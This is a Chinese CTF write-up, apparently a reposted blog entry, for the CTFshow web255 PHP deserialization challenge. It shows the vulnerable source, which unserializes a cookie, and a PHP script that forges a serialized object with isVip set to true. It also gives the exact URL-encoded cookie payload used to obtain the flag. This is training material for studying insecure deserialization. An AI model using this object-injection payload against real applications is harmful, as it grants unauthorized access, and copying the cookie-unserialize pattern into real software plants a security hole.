CTFshow 反序列化 web255
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 反序列化 web255
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結
源碼
<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/error_reporting(0); highlight_file(__FILE__); include('flag.php');class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false;public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;echo "your flag is ".$flag;}else{echo "no vip, no flag";}} }$username=$_GET['username']; $password=$_GET['password'];if(isset($username) && isset($password)){$user = unserialize($_COOKIE['user']); if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}}else{echo "no vip,no flag";} }思路
考點是反序列化,username和password要求和上題一樣還是xxxxxx
$user = unserialize($_COOKIE['user'])if($user->login($username,$password)){if($user->checkVip()){$user->vipOneKeyGetFlag();}我們需要構造反序列化數據,直接把類拿過來,只有類和變量會被反序列化,其他可以去掉,$isVip記得把改成true
<?php class ctfShowUser{public $username='xxxxxx';public $password='xxxxxx';public $isVip=false; //=> true }//url編碼防止忽略不可見字符 echo(urlencode(serialize(new ctfShowUser())));運行腳本
題解
get: ?username=xxxxxx&password=xxxxxx cookie: O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
拿到flag
總結
后面有空會在專欄補上php反序列化相關的筆記
https://blog.csdn.net/kracxi/category_11534417.html
總結
以上是生活随笔為你收集整理的CTFshow 反序列化 web255的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 反序列化 web254
- 下一篇: CTFshow 反序列化 web256